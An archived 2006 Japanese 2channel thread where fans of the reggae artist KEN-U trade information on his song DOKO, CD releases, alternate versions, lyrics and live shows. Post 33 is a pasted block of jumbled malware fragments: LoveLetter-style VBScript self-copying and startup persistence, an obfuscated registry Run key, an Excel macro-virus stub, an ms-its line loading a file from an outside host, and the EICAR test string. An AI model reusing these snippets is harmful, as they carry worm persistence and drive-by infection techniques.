5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【Dokoで】\KEN-U/【ドライブ】

1 :NO MUSIC NO NAME:2006/03/10(金) 13:05:39 ID:ji26Dg+j
なかったので、立ててみました。

2 :NO MUSIC NO NAME:2006/03/13(月) 04:41:02 ID:wLDxJ2b4
>>1
そして華麗にA(σ・Д・)σゲッツ!!



3 :NO MUSIC NO NAME:2006/03/13(月) 08:04:05 ID:djFnrN63
一番の女と甘い夜〜!

4 :NO MUSIC NO NAME:2006/03/13(月) 19:58:55 ID:wLDxJ2b4
テキーラの香りがする夜に♪

5 ::2006/03/20(月) 16:47:20 ID:b7235qIB
どこどこめのゃりばもないょあついほどでも

6 :NO MUSIC NO NAME:2006/03/22(水) 23:52:35 ID:1APnrQmo
Doko売ってないよ・・・。840円で売ってるやつあるはずなのに・・・。
レンタルもなさそうだし。誰か私にDoko手に入れる方法教えて!!

7 :NO MUSIC NO NAME:2006/03/24(金) 16:17:08 ID:mx74iSds
さすがに840円で手に入れる方法はわからないなぁ
ネット通販を使ってみては? アマゾンとかね

8 :NO MUSIC NO NAME:2006/03/28(火) 19:44:52 ID:vOcDZjT1
KEN-UではDOKOがいいとは思うが、正直、すぐ飽きる(;・∀・)KEN-UのCD買うくらいなら、
HEMO+MOOFIRE(多分スペルミス)って人がだしてる「ESCAPE」というアルバム買ったほうがいい。
Dokoは普通に入ってます。あとはMICKY RICHの「WINE YHER」ってのがあったり、
ランキンさんの「New Day-O」ってのが入ったりしてるし、DOKOの伴奏のやつばっかりです。
俺的には1番に入ってる多分「ESCAPE REMIX」とかいう名前のがオススメかな。
DOKOの伴奏でSEAN PAULが出てきたりして。
なかなか見つからないと思うけど(^^;)

9 :NO MUSIC NO NAME:2006/03/30(木) 00:57:39 ID:u9S4+BVD
KEN-Uってなんて読む?

10 :NO MUSIC NO NAME:2006/03/30(木) 16:07:00 ID:dI67qEvZ
>>9
ケンユー

11 :NO MUSIC NO NAME:2006/03/30(木) 16:08:24 ID:dI67qEvZ
俺は>>8>>9の者だがIDが変わってるのは何故なんだ???

12 :NO MUSIC NO NAME:2006/03/30(木) 16:10:15 ID:dI67qEvZ
ま、そういう事は爽やかに受け流していくか・・
      l      |   ,     |    \    ! ̄!
    ‐─┼─‐ ―┼―┼-、  ―┼―ヽ,  ヽ   ! !
     メ、 | メ、   |   '  /    |   /      !__!
     メ、 | メ、    |        |   /      ,-、
      人      |        |   /       ヽ-'
    -‐'  `‐- 
             ,---――――-、
            ミ,r―-、,-―-、  ヽ
            { ―、  ,― `l  |
            |  ≡  ≡  |  |
            l   (      `へ |
            |  ,ー――-,   /
            ヽ ヽ、 ̄ ̄/   /~l
             \  ̄ ̄' ,./ |
               |゛"' '"゛    |


13 :NO MUSIC NO NAME:2006/03/30(木) 16:11:15 ID:dI67qEvZ
クッキーをつけたからなのか・・としつこく疑問に思っている俺は負け組

14 :NO MUSIC NO NAME:2006/04/10(月) 20:41:33 ID:e5JlhGCT
Dokoゲットしたのはいいが歌詞がわかんないとカラオケで歌えないジャン><

15 :NO MUSIC NO NAME:2006/04/12(水) 01:38:49 ID:lIWXnPZ/
8            そのとーり

16 :NO MUSIC NO NAME:2006/04/17(月) 20:52:29 ID:QP7lFxI8
スレ立てた者です。
立ててから1ヶ月ほど経ちましたが、あまり伸びませんでしたね。
やはりまだメジャーではないのかな。
>>8さんの仰ることも最もですが
ここを見て、誰?って思ったら、探してみて一度は聴いてみてくださいな。

書き込む際はsage進行でお願いします。

>>14さん
歌詞がわからないまま歌うのもネタにはなりますよw
恥ずかしがらずに歌っちゃいましょう!

17 :NO MUSIC NO NAME:2006/04/28(金) 13:30:19 ID:5WI0IQlG
ケータイのドコカラってサイトのうたぼんってところににKEN-Uの歌詞あるよ。

18 :pika:2006/05/08(月) 02:49:44 ID:3be8TZeH
4月末、沖縄でKEN-Uを目撃!写メお願いしたら普通にとってくれたぁ〜

19 :NO MUSIC NO NAME:2006/05/12(金) 20:30:24 ID:gq3ZMTHE
DOKOを100円でゲット!

20 :さくら:2006/05/12(金) 20:50:34 ID:5AigZzBu
お初です(>ω<●)
質問なんですが,KEN-UのDOKOって
シングルで出してますか??
出してたとしたらカラオケバージョンも
収録してますか??


21 :NO MUSIC NO NAME:2006/05/18(木) 20:17:25 ID:GaRlp8/6
>8を見ろ

このアルバムにエスケープのインストが最後に入ってる

22 :NO MUSIC NO NAME:2006/05/18(木) 20:30:17 ID:w0gffT3Q
睡眠薬バージョン誰が歌ってるかわかりますか?

23 :AttackStore☆:2006/05/24(水) 18:51:08 ID:LgIQ/9Qu
AttackStore★WEB SHOP OPEN!!! http://www.attack-store.com

KEN-U&プロスケーター竜神のブランドDZEE、山本"KID"徳郁氏プロデュースブランドHARD HIT等も取り扱っております。
取扱いブランド

ANDSUNS/Five-O/RADIALL/nutsANDbones/MagnumForce
DZEE/THEILLEST/Ruler/Kriminal/CALEE/CHILDHOOD
POLOJEANS/RalphLauren/POLORUGBY/RRLLEBELAPE/ROTHCO
Carhartt/NYHAT/kangol/DICKIES/Levi`s/OLDNAVY/NIKE
IMPORT/MIX CD/etc.......
携帯からもご利用いただけます
告知させていただき誠にありがとうございました


24 :NO MUSIC NO NAME:2006/05/28(日) 05:09:59 ID:Yo78Qx5j
睡眠薬バージョン歌ってんのはBarrier Free
てアーティストだよ。

25 :NO MUSIC NO NAME:2006/06/02(金) 15:30:42 ID:a5G7uSFW
睡眠薬バージョンの曲名ってなんていうんですかぁ〜?

26 :NO MUSIC NO NAME:2006/06/21(水) 08:49:58 ID:GBnHtctC
日本ハムの試合見に行った時、森本選手が登場曲にDOKO使ってて
この曲誰だ?から調べました。
この曲しか知らないけど好きだ 着うたゲト

27 ::2006/06/22(木) 02:20:05 ID:8q6mxMxE
初めまして!
ESCAPEってショーン・ポールも参加してるんですか?ジャケ裏みたけど名前がなかったもので・・・

28 :NO MUSIC NO NAME:2006/06/24(土) 03:56:00 ID:ABrKKff6
>>27一曲目のリミックスにショーンポールが歌ってます!

29 :NO MUSIC NO NAME:2006/06/26(月) 22:15:03 ID:wp1DbQD6
DUBものでお薦めある?

30 ::2006/06/27(火) 19:43:06 ID:mtJF9+Vo
28そうなんですか!ありがとうございます!
友情出演みたいな感じですか?ちょっとしか歌ってませんよね?買ってみよっかなぁ

31 :KEN:2006/07/02(日) 17:46:33 ID:RthVoPz5
高知でフレッシュエアやってます

32 :NO MUSIC NO NAME:2006/07/02(日) 18:17:33 ID:YjU82kuy
ドライブーー

33 :NO MUSIC NO NAME:2006/07/02(日) 18:27:19 ID:5pZqWH9t
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
ܷܵܶ

34 :NO MUSIC NO NAME:2006/07/04(火) 15:05:25 ID:N3E4HNUx
KEN-Uの歌やっぱいぃですね(●´艸`)

35 ::2006/07/05(水) 17:16:15 ID:wUYPZHbs
ハンターチャンスversionたるものが欲しいのですがCDないんすかね?

36 :NO MUSIC NO NAME:2006/07/06(木) 16:25:49 ID:juDsWRSe
無料でとれるyurenagaraのフル着探してます。クレクレ&携帯ですみませんがどなたかURLをUPしていただけませんか?おねがいします。

37 :36:2006/07/06(木) 16:28:03 ID:juDsWRSe
携帯でってゆうの忘れました。連投すみません

38 :NO MUSIC NO NAME:2006/07/07(金) 23:01:05 ID:BdCvD0xN
http://megaview.jp/view.php?v=471059 ここ見てみ

39 :NO MUSIC NO NAME:2006/07/08(土) 13:00:14 ID:lbeoiHCe
アゲアゲ〜

40 :NO MUSIC NO NAME:2006/07/10(月) 06:49:59 ID:YKnTR/vC
昨日、熊本にケンユーきたよ!まじかっこよかった!

41 :NO MUSIC NO NAME:2006/07/13(木) 18:06:00 ID:H1OTPHsS
みんなつまんないなー。

42 :NO MUSIC NO NAME:2006/07/13(木) 20:06:15 ID:tZoshcXy
伸びないね


そんな俺はアコースティックメドレイが好き

43 :NO MUSIC NO NAME:2006/07/14(金) 12:55:19 ID:NFR7GtT7
誰かレス番16と33の削除依頼だしてくれ。

そんな俺はYURENAGARAでドライブする

44 :NO MUSIC NO NAME:2006/07/14(金) 16:37:57 ID:S9wg1lY9
まだ免許ないんだよなぁ

ドライブしてえ


あえてまだ見ぬ世界で

45 :NO MUSIC NO NAME:2006/07/15(土) 01:49:12 ID:ZBXkfJEr
やっぱケンユーいいねー

46 :NO MUSIC NO NAME:2006/07/15(土) 09:08:03 ID:8l0ODYIW
早くCDでないかなあ

47 :NO MUSIC NO NAME:2006/07/19(水) 22:26:00 ID:pgAhFOG7
雑魚ってバージョンは誰ですか?

48 :NO MUSIC NO NAME:2006/07/22(土) 22:03:22 ID:hQyyzlnH
↑誰ってケンユーでしょ。

49 :NO MUSIC NO NAME:2006/07/26(水) 12:48:41 ID:SpZefggy
伸びないな


無名なんだろうなぁ
歌はいいのにね

50 :NO MUSIC NO NAME:2006/07/27(木) 15:06:20 ID:6Utofz15
そうだねー。みんな盛り上がろうよ!

51 :お初:2006/07/28(金) 00:48:03 ID:EnhFT/yU
ONE−DAYの歌詞欲しい〜

52 :NO MUSIC NO NAME:2006/07/28(金) 01:08:59 ID:bYYS2tvk
汗に濡れ〜


けんゆの歌は息継ぎがむつかしいよな
歌うなら

53 :NO MUSIC NO NAME:2006/07/28(金) 08:01:59 ID:Xomtvd+w
たしかに難しいね。でもなんかカッコイイ

54 :NO MUSIC NO NAME:2006/08/07(月) 04:32:47 ID:FwQrAOiI
KEN-Uのサーキットって曲について、誰か知ってる人いませんか〜??


55 :NO MUSIC NO NAME:2006/08/07(月) 14:52:30 ID:Ay6rbkRR
知ってるけど。ナニカ?

56 :NO MUSIC NO NAME:2006/08/09(水) 14:57:00 ID:ohLuTOPa
KEN-Uかっこいいとか…お前らKEN-Uしか知らんの?

57 :NO MUSIC NO NAME:2006/08/10(木) 06:50:37 ID:KOygtgec
↑お前こそビジュアル系のくせにわかってんの?

58 :NO MUSIC NO NAME:2006/08/11(金) 08:48:01 ID:Ek96NAdW
氷室京介を知ってますが

59 :NO MUSIC NO NAME:2006/08/11(金) 08:50:56 ID:2smmANSM
KEN-Uスレあったんだな

最近聞いてないな…

60 ::2006/08/11(金) 17:42:05 ID:l+Sv13nq
はじめましてぇぇ!今年からケンユ−ぉ知った奴でポ↓↓マヂ知らなかったァ!
けっこぉッてか、いっぱぃ有名なんでスね・・・。ソレぉ知らなかったぁたしゎ
闇・・・(闇))ぃろぃろ教えてサィ・・・。

61 :NO MUSIC NO NAME:2006/08/12(土) 00:15:53 ID:zDyu5Ski
>>60
きんもー☆

62 :NO MUSIC NO NAME:2006/08/12(土) 06:47:20 ID:aHCfQJHD
↑お前もキモッ

63 :NO MUSIC NO NAME:2006/08/19(土) 14:59:22 ID:yRqmIe4T
ttp://img2.megaview.jp/f/20060506/mov/abhvvie6512410.3gp
誰かこれの情報知ってたら教えてください。

64 :NO MUSIC NO NAME:2006/08/20(日) 17:59:08 ID:/HDcxCjM
↑H.A.Fだよ!

65 :NO MUSIC NO NAME:2006/08/21(月) 01:34:22 ID:DoBVWOVN
↑ありがとうございます!

66 :NO MUSIC NO NAME:2006/08/21(月) 15:35:22 ID:l/OGwEw2
いまさら着メロのことで、しかも有料サイトの話題で気が引けるけど
いろメ■のアレンジバージョン、気分はリゾートでYURENAGARAを聴いてみ。
結構イイ感じになるよ

67 :NO MUSIC NO NAME:2006/08/22(火) 04:18:20 ID:h33P+XGB
今、海外にいるのですが、DOKOをダウンロードできるサイトありますか?
もし、知ってる方がいましたら教えてください!
実家にはJUNKOのhow to dance VOL.2があって、DOKOのPVも入ってるのですが、送ってもらおうと思ってお願いしたのですが、見つけられないとのことで・・・
よろしくお願いします!

68 :NO MUSIC NO NAME:2006/08/23(水) 14:00:42 ID:Ax7vqEGH
まぢKEN-Uいーね(^-^)

69 :NO MUSIC NO NAME:2006/08/24(木) 14:27:52 ID:epewk4SB
新しいアルバムでたよね!!
結構よかったよ!

70 :NO MUSIC NO NAME:2006/08/29(火) 06:49:09 ID:4iUYus7o
みんなケンユーの何の曲が好き?

71 :NO MUSIC NO NAME:2006/08/29(火) 07:14:48 ID:nmPEcZxD
メドレイ

72 :NO MUSIC NO NAME:2006/08/29(火) 14:13:39 ID:fvfYt++3
この人のCDってツタヤとかでレンタルできますか?教えてください!

73 :NO MUSIC NO NAME:2006/08/29(火) 20:19:12 ID:4iUYus7o
できるよ!最近レンタルでてるよ

74 :NO MUSIC NO NAME:2006/08/30(水) 21:50:49 ID:HUMavo8P
ケンユーとミッキーとドミノ3人で出したCDもいいね★ミ

75 :NO MUSIC NO NAME:2006/08/31(木) 23:15:02 ID:o9x/C9TP
どんな感じ?

76 :NO MUSIC NO NAME:2006/09/01(金) 20:25:45 ID:5tVA73eD
イイかんぢだょ!ほとんどミッキーとドミノの歌だけどノリAです!ちなみにユニット名ゎENT DEAL LEAGUEだょ!

77 :NO MUSIC NO NAME:2006/09/01(金) 20:26:41 ID:JXhlK888
突然の書き込みすみません。>< 集計とってます。
ベストなバストはなにサイズ? 協力してちょ
http://live23.2ch.net/test/read.cgi/livecx/1157100518/


78 :NO MUSIC NO NAME:2006/09/03(日) 08:28:58 ID:FkrIbLIS
ケンユーって何才?

79 :NO MUSIC NO NAME:2006/09/03(日) 09:18:21 ID:Mk8pptFB
アジサイ

80 :NO MUSIC NO NAME:2006/09/03(日) 19:26:00 ID:tJkcX/LR
けんゆぅクンゎ9月20日で28サイになるんだよぉ!!

81 :ゆぅ☆:2006/09/03(日) 23:03:46 ID:H4nsH09o
DOKOの違うバージョンってどこにうってあるんですか?

82 :ハゲシイナ:2006/09/05(火) 20:24:35 ID:Ivz3YYGU
お店で売ってあるよ。

83 :NO MUSIC NO NAME:2006/09/09(土) 19:03:17 ID:/f6ZOeLv
DOKOの睡眠薬バージョンの事詳しく知ってる方いたら教えて下さい!KEN-U大好き☆

84 :NO MUSIC NO NAME:2006/09/10(日) 08:03:48 ID:r/fUjsaZ
バリアフリーにはいってます!

85 :NO MUSIC NO NAME:2006/09/10(日) 13:32:04 ID:glF2UTNi
DOCO睡眠薬バージョンゎワーグマン2K5SOUDクラッシュってCDに入ってるょ。

86 :NO MUSIC NO NAME:2006/09/10(日) 14:47:03 ID:glF2UTNi
ワーグワンでしたぁ↓

87 :NO MUSIC NO NAME:2006/09/10(日) 22:30:35 ID:4e7eIVMW
ありがとうございます☆ワーグワン?普通にツタヤとかに売ってありますか?

88 :NO MUSIC NO NAME:2006/09/11(月) 03:52:35 ID:dYgX8GuL
ケンユーのDOKO、いまさらながら聴いてみた
いいですねー
色々tとレンタルしてみます

89 :NO MUSIC NO NAME:2006/09/11(月) 07:56:44 ID:XjMiycMO
ワーグワン2K…ゎツタヤとかにゎ売ってなぃみたぃだょ。あたしがみたのゎオークションにでてるやつでしたぁ↓

90 :NO MUSIC NO NAME:2006/09/11(月) 13:30:35 ID:vWYDqnIf
age


91 :NO MUSIC NO NAME:2006/09/11(月) 19:35:54 ID:XjMiycMO
DOKOだけぢゃなくいろA聞いてみてね↑ほんとゎ生KEN-Uみたぃけど田舎だから遠いょぉー!ダンス行って見た!って人いますか?

92 :NO MUSIC NO NAME:2006/09/11(月) 21:49:28 ID:Qwz4t4DV
>>91
本当に田舎者だね。

93 :NO MUSIC NO NAME:2006/09/11(月) 22:24:45 ID:XjMiycMO
そぅだょホントに田舎もんだょ!!YOUゎ行ったことあるんでしょ?UNITYとか?

94 :NO MUSIC NO NAME:2006/09/11(月) 23:09:18 ID:mQS2IYdY
え〜!売ってないんだぁ↓オークション?他に手に入る方法知らないですか?ホントに欲しいんです!!

95 :NO MUSIC NO NAME:2006/09/11(月) 23:46:48 ID:XjMiycMO
ごめんね↓オークションしかわかんないんだ↓ちなみにCDゎAマイ組で3500円からだったょ。かなり良さげなカンジでした!でもたまにツタヤもチェックしたほぅがいいよ!レアCDあったりするから!

96 :NO MUSIC NO NAME:2006/09/12(火) 22:31:25 ID:0URuIHAx
まじっすか・・・色々とありがとうございました!
KEN-Uについてすごい情報とかあったら教えて下さい☆彡

97 :NO MUSIC NO NAME:2006/09/13(水) 09:51:16 ID:uHpmxB3X
すごぃ情報ゎナィけど、ダンスどこであるかとか、ESCAPE2 WATCHNG U買ったら特典でゆれながらのPVついてるとかそれくらぃです。お役にたてなくてゴメンナサイ↓あとRACYBULLETのサイトもみてみたらどぅかな?

98 :NO MUSIC NO NAME:2006/09/13(水) 22:06:16 ID:l6d5Jy4Z
↑そのエスケープ2ってCD?普通にタワレコとかに売ってあるの!?

99 :NO MUSIC NO NAME:2006/09/13(水) 22:39:28 ID:uHpmxB3X
WATCHING Uゎタワレコで買ったょッ!KEN-Uのゆれながらのリディムで18曲入りでしたぁ。DOMINOくんのDAYBYDAYもよかったでし☆

100 :NO MUSIC NO NAME:2006/09/13(水) 22:40:56 ID:uHpmxB3X
ごめん。それゎCDです!

101 :NO MUSIC NO NAME:2006/09/20(水) 07:24:02 ID:xG7jVknu
はっぴぃばぁすでぃKEN-U

102 :NO MUSIC NO NAME:2006/09/20(水) 12:54:50 ID:FmY0mryH
lunior Deeやヒビキラーとの共演の曲もなかなかいいよ

103 :NO MUSIC NO NAME:2006/09/21(木) 12:51:35 ID:kjJKtfx1
>>52今更だが、あれはミッキーと二人で歌ってるんで…一人では息継ぎが難しいとオモ…

104 :NO MUSIC NO NAME:2006/09/21(木) 12:52:26 ID:WrxyvRxp
喉から手が出てマイクをとるウィーア―EDL

105 :NO MUSIC NO NAME:2006/09/22(金) 01:16:17 ID:3k212pGf
KEN-Uスレ今更ミツケタ
けんさん最高だな。歌と声に惚れた

DOKOもいいけどONE DAYも好きだ

106 :NO MUSIC NO NAME:2006/09/24(日) 14:01:24 ID:tjBazwJl
『ワーグワン2K5サウンドクラッシュ』買いました!やっと睡眠薬バージョン聞けました〜教えてくれてありがとうございました。
ワッチングUも置いてなかったんで予約しました!早く聞きた〜い!

107 :NO MUSIC NO NAME:2006/09/28(木) 02:06:38 ID:fRixKwM+
昨日ようやく注文してたENT DEAL LEAGUEのDOWN TOWN MOVEMENTが届きました
ドミノも好きだしミッキーも好きだけど、やっぱりケンユーが一番好き
HONEYがツボだw

108 :NO MUSIC NO NAME:2006/09/28(木) 03:54:51 ID:iercEtXo
いろんなミックステープにはいってるよ^^
dubって形だから歌詞が違うから新鮮だで☆


109 :NO MUSIC NO NAME:2006/09/28(木) 10:42:11 ID:KaY9oGyS
こわいわ

110 :NO MUSIC NO NAME:2006/10/06(金) 07:45:33 ID:xtUIYzoi
KEN-U - YURENAGARA Live Ver.
ttp://www.youtube.com/watch?v=QHl07jYRbGk

とりあえず貼っとく

111 :NO MUSIC NO NAME:2006/10/11(水) 00:22:07 ID:W60Sumdr
KISS THE SKYって曲知ってる人いますか?

112 :NO MUSIC NO NAME:2006/10/11(水) 13:01:40 ID:foa2BlZQ
しってるよんοYOUNG BLOODッてCDにはいってたよんο

113 :NO MUSIC NO NAME:2006/10/11(水) 21:52:02 ID:W60Sumdr
俺がKISS THE SKYはじめて聞いたとき、かなりいい歌!って思ったんすけどYOUNG BLOODに収録されてるのとは違うんですよ。もっと曲のテンポが早い感じで。たぶん別ver.みたいのだと思うんすけど、誰かわかる人いませんか??

114 :NO MUSIC NO NAME:2006/10/11(水) 22:59:42 ID:foa2BlZQ
ハンターチャンスDUB!?

115 :NO MUSIC NO NAME:2006/10/13(金) 23:38:09 ID:EZDRa758
>>113
レゲエにはDUBというのがあるのもしらんのか?

116 :NO MUSIC NO NAME:2006/10/14(土) 02:50:34 ID:ViUOZAaQ
知らないわ。ごめん

117 :NO MUSIC NO NAME:2006/10/14(土) 15:51:02 ID:aiIOTcWT
PV見たいけどDVDとか売ってないの?

118 :NO MUSIC NO NAME:2006/10/14(土) 19:34:47 ID:Pl3ZOgA4
>>117
なんのPV?

119 :NO MUSIC NO NAME:2006/10/14(土) 19:49:46 ID:aiIOTcWT
KEN-Uならなんでもいいんだけど…(・・)売ってますか?

120 :NO MUSIC NO NAME:2006/10/14(土) 22:01:21 ID:Pl3ZOgA4
DOKOのPVはでてるけど、もう生産終了してると思うんだ。あとは、こないだでたワンウェイのWATCHING Uのオマケで(先着順でもらえる)YURENAGARAのPVが入ったDVDがあるよ。

121 :ケンちゃん:2006/10/14(土) 22:49:49 ID:GWXEYxGJ
このサイトにKEN-Uのタオルがあるぜ
ttp://treasurebox-muzik.com/

122 :NO MUSIC NO NAME:2006/10/15(日) 00:17:04 ID:YlWOrzyg
生産終了しちゃってるんですか〜!?もう買えないんですかね(>_<)

123 :NO MUSIC NO NAME:2006/10/15(日) 10:31:55 ID:vKpvLOUz
>>122
オークションとかにはでてるかもよ。

124 :NO MUSIC NO NAME:2006/10/15(日) 14:57:41 ID:YlWOrzyg
普通にツタヤとかでは買えませんか?

125 :NO MUSIC NO NAME:2006/10/15(日) 19:50:39 ID:vKpvLOUz
>>124
う〜ん。どうかな?こないだまでは、タワレコでうってたけど、今は取り扱い終了になってたよ。

126 :NO MUSIC NO NAME:2006/10/15(日) 20:30:44 ID:YlWOrzyg
そうなんですかぁ!!??まだ売ってるとこありますかね〜。もうネットとかじゃないとムリかな

127 :NO MUSIC NO NAME:2006/10/17(火) 20:51:33 ID:mKwxOw1F
KENーU(けんゆー)で合ってるよね?

128 :NO MUSIC NO NAME:2006/10/19(木) 02:40:56 ID:sn1SWQlY
>>117
画質悪いけど、PCあるなら一応ここで見れるよ。
http://www.bacchanal45.com/media/video3.html

129 :NO MUSIC NO NAME:2006/10/19(木) 15:09:55 ID:vkPFSQ0i
ありがとうございます!!!!今見れないんで帰ったら見てみます!

130 :NO MUSIC NO NAME:2006/10/20(金) 11:25:42 ID:Ew+uRlqC
見れました〜!!やっぱメッチャかっこいい〜!ありがとうございます!

131 :NO MUSIC NO NAME:2006/10/24(火) 20:43:45 ID:6tMs/jzh
また新しいアルバムってでないのかな?

132 :NO MUSIC NO NAME:2006/10/24(火) 21:46:06 ID:P3m8vHox
見れました!やっぱいKEN−Uかっこいい!声もいいし、全部いいね

133 :NO MUSIC NO NAME:2006/10/24(火) 21:48:20 ID:P3m8vHox
1ヶ月ぐらい前に生KENーU見たよ

134 :NO MUSIC NO NAME:2006/10/24(火) 22:02:39 ID:qMggajGt
KEN-Uって結婚してんの?かな…

135 :NO MUSIC NO NAME:2006/10/25(水) 20:51:52 ID:IfB/jCEq
踊りなSexyLady

136 :NO MUSIC NO NAME:2006/10/25(水) 22:18:42 ID:4R4cB/is
超かっこいい〜!!PVみたいなぁ…

137 :NO MUSIC NO NAME:2006/10/25(水) 23:30:18 ID:Q1G07C0K
KENーUの今の髪型いいよね!

138 :NO MUSIC NO NAME:2006/10/26(木) 16:34:29 ID:E7r0g1Js
youtubeにちょっとだけケンユーの動画あった。
KEN-U - YURENAGARA Live Ver.
http://www.youtube.com/watch?v=QHl07jYRbGk

ENT DEAL LEAGUE - 踊れJAPAN (Odore JAPAN) [PV] [MUSIC VID]
http://www.youtube.com/watch?v=N5sVDVj0EIk

139 :NO MUSIC NO NAME:2006/10/26(木) 21:40:27 ID:LiPh48OI
今の髪型ってどんなんですか?変わったと?どんなんか誰か貼りして下さい!お願いします(^-^)

140 :NO MUSIC NO NAME:2006/10/27(金) 11:47:07 ID:TSxow2RS
>>138
ありがとうです!!すごく感謝!!KEN−U本当にかっこいい!!
あぁ〜KEN−Uに会ってみたい!!

141 :NO MUSIC NO NAME:2006/10/29(日) 08:33:18 ID:okupQ8N9
誰かエスケープの歌詞取れるとこ知りませんか★


142 :NO MUSIC NO NAME:2006/11/07(火) 11:56:05 ID:4pQZKj4X
http://www.mash-up.jp/material/photo/event/event_flyer1_done_200611061115_12344.jpg

鶯谷にくるらしい

143 :NO MUSIC NO NAME:2006/11/10(金) 15:54:07 ID:vI08TfHp
SEAMOと歌ってる??

144 :NO MUSIC NO NAME:2006/11/11(土) 22:40:49 ID:jE9iitHO
割り込みごめんなさい。
今年の「日本一」北海道日本ハムの1番バッター森本ひちょり選手が、
札幌ドームで打席に入る時の「選手登場曲」=KENーUのDOKOだってこと
皆さんはご存知でしたか? どっちもかっこよくてだいすき!

145 :NO MUSIC NO NAME:2006/11/15(水) 17:21:38 ID:wHgMXiUP
だれか〜

146 :レゲエ馬鹿:2006/11/16(木) 02:10:29 ID:9IMYn5XS
情報求ムです!
ken-uとmoominが同じ曲でコンビネーションしてるらしい。。。
しかも超良いらしい〜アルバム出るのでしょうか?
いつ出るのか教えてプリーズです。

147 :NO MUSIC NO NAME:2006/11/16(木) 10:45:06 ID:JAF/ih/j
ken-u逢いたい。
どこかでライブやったりしないの??
見に行きたい。おしえてくださーい!

148 :NO MUSIC NO NAME:2006/11/16(木) 18:48:56 ID:qEDyBE1s
CDなんだけどGIFTED CHILDSかなぁ。違うかなぁ。ENTメンバー.MOOMIN.RUDEBWOYFACE.HIBIKILLAとかいろんなアーティストがはいってる。11月22日に発売だぁ!絶対買うぞぉ!

149 :NO MUSIC NO NAME:2006/11/17(金) 17:43:51 ID:iQZmIodh
ライブなら、11月23日、アルバム”DOWN TOWN MOVEMENT”のファイナルが渋谷であるよ☆いきたいなー

150 :NO MUSIC NO NAME:2006/11/17(金) 18:38:35 ID:zDvKKgEj
いつも旦那の雑誌サムライとオーリー見てるけど毎号かっこいいKEN-Uが載ってるよ。CDとかダンス情報はRACYBULLETのサイトみるといいよぉ。

151 :NO MUSIC NO NAME:2006/11/24(金) 19:17:52 ID:MViu7HKY
プロフィール分かる方いませんかぁ?身長・たんじょーび・血液型…どれか1つでも…

152 :NO MUSIC NO NAME:2006/11/24(金) 21:24:39 ID:X2uWuvXx
「HMVレビュー」より引用。↓
http://www.hmv.co.jp/product/detail.asp?sku=1488106

Ken-U・・・
1978年9月20日生まれ A型 東京都出身。
浅草を拠点とするSound Crew[Racy Bullet]に所属するDee Jay集団
・Ent Deal Leagueの一人。
2000年頃から主に東京のCLUBその他関東近郊において精力的にLIVE
活動を行っている――

153 :NO MUSIC NO NAME:2006/11/25(土) 10:20:12 ID:AU/cLCXp
ありがとございました>_<

154 :NO MUSIC NO NAME:2006/11/30(木) 13:59:02 ID:TSTwvxjn
ウィキペディアだとヤンキー母校に帰るのモデルの高校出身らしいよ。不登校児の.゚.(つД`).゚.ハニーのPVでタバコ吸ってるのショックやー(*_*)なんかリリックから知的で真面目なイメージがあったのに(*_*)88よりタバコのがイメージ悪いφ(.. )

155 :NO MUSIC NO NAME:2006/11/30(木) 17:15:59 ID:rwueh8xv
その過去が本当でも別に気にならなーい。KEN-Uが仲間やレゲエと出会って今がある。それでいいんじゃなぁい?

156 :NO MUSIC NO NAME:2006/11/30(木) 23:06:38 ID:9Vd/a1LH
彼女の持ってるCD聴いてファンになった

157 :NO MUSIC NO NAME:2006/12/04(月) 22:24:47 ID:EAvV35Bk
いらっしゃい

158 :yoshiomi:2006/12/05(火) 01:16:32 ID:hX0HULh/
ken-uはまってかなりたちました↑いまだに勢いおとろえずですねぇ☆highest mountain にでてますが誰かDVDかいましたか??感想おねがいします↑


159 :NO MUSIC NO NAME:2006/12/05(火) 14:16:45 ID:yPtCiPlL
ハイエスト買いました!ENT一番最初に出ましたがすごくよかったよ。もっと見たかったなー。なんかENTのツアーDVD出る予定だそうですよ!楽しみ!

160 :NO MUSIC NO NAME:2006/12/05(火) 22:41:05 ID:54fdMnKP
超欲しい〜!!レコードも欲しいんだけど売り切ればっかなんですよねぇ

161 :NO MUSIC NO NAME:2006/12/06(水) 13:02:47 ID:lEnWSbwE
レコード、タワレコのモバイルであるっぽいよ↑

162 :NO MUSIC NO NAME:2006/12/10(日) 15:33:56 ID:69KYVNI0
HONEY PV
http://www.youtube.com/watch?v=O94B0XNhRe8

BULLET RIDDIM MEDLEY
http://www.youtube.com/watch?v=b1KveegGGKc

163 :NO MUSIC NO NAME:2006/12/11(月) 20:44:12 ID:OoQbyMQ7
KEN-U超カッコイイ〜!!実家にしかPCないからいつも見れないのが残念。

164 :NO MUSIC NO NAME:2006/12/13(水) 15:39:27 ID:UkHbNaqa
ドミノキャット微妙すぎ

